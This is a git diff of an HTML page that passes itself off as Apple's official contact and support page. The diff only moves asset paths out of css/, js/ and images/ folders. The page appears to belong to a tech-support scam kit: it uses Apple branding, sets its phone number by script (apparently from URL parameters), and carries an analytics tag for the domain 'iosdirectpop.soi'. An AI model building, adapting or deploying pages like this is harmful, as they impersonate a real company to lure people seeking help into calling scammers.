--- a/index.html
+++ b/index.html
@@ -4,9 +4,9 @@
     <meta http-equiv="cache-control" content="max-age=3600">
     <title>Contact - Official Apple</title>
     <meta name="description" content="Contact Apple support by phone or chat, set up a repair, or make a Genius Bar appointment for iPhone, iPad, Mac and more.">
-    <link rel="stylesheet" href="css/Base.css" type="text/css">
+    <link rel="stylesheet" href="Base.css" type="text/css">
     <link rel="stylesheet" type="text/css" href="_families%253dSF%252bPro%252cv1_7CSF%252bPro%252bIcons%252cv1html.html">
-    <script src="js/text_tel.js"></script>
+    <script src="text_tel.js"></script>
 
 </head>
 
@@ -147,7 +147,7 @@
                         <div class="as-banner-image as-banner-image--top">
                             <style type="text/css">
                                 .as-banner-image.as-banner-image--top {
-                                    background-image: url("images/contact-us-hero.image.large_2x.jpg");
+                                    background-image: url("contact-us-hero.image.large_2x.jpg");
                                 }
 
                                 .as-banner-image.as-banner-image--top:before {
@@ -157,11 +157,11 @@
 
                                 @media only screen and (max-width: 735px) {
                                     .as-banner-image.as-banner-image--top {
-                                        background-image: url("images/contact-us-hero.image.small_2x.jpg");
+                                        background-image: url("contact-us-hero.image.small_2x.jpg");
                                     }
                                 }
                             </style>
-                            <img sizes="(min-width:735px ) 735w, 100vw" srcset="images/contact-us-hero.image.small_2x.jpg 735w, images/contact-us-hero.image.large_2x.jpg 1440w" alt="" class="as-image-speculativedownload" src="images/contact-us-hero.image.large_2x.jpg">
+                            <img sizes="(min-width:735px ) 735w, 100vw" srcset="contact-us-hero.image.small_2x.jpg 735w, contact-us-hero.image.large_2x.jpg 1440w" alt="" class="as-image-speculativedownload" src="contact-us-hero.image.large_2x.jpg">
                         </div>
                     </div>
                     <div class="as-banner-content">
@@ -184,7 +184,7 @@
                 <div class="ac-gf-footer-shop"> More ways to: Visit an <a href="#" class="analytics-exitlink">Apple Store </a>, <span class="nowrap">call  <font class="js_setPhoneBlock"></font>, or  <a href="#" class="analytics-exitlink">find a reseller </a></span>.
                 </div>
                 <div class="ac-gf-footer-locale">
-                    <a class="ac-gf-footer-locale-link" href="#" title="Choose your country or region" aria-label="United States. Choose your country or region"><img class="ac-gf-footer-locale-flag" src="images/us.png" alt="" width="16" height="16">United
+                    <a class="ac-gf-footer-locale-link" href="#" title="Choose your country or region" aria-label="United States. Choose your country or region"><img class="ac-gf-footer-locale-flag" src="us.png" alt="" width="16" height="16">United
 					States </a>
                 </div>
                 <div class="ac-gf-footer-legal">
@@ -204,7 +204,7 @@
 
 
 
-    <script src="js/jquery-1.12.0.min.js"></script>
+    <script src="jquery-1.12.0.min.js"></script>
     <script>
         function getURLParameter(name) {
             return decodeURI(
@@ -355,8 +355,7 @@
 
 
 
-<script defer="" data-domain="iosdirectpop.soi" src="js/script.js"></script>
-
+<script defer="" data-domain="iosdirectpop.soi" src="script.js"></script>
 
 
 </body></html>
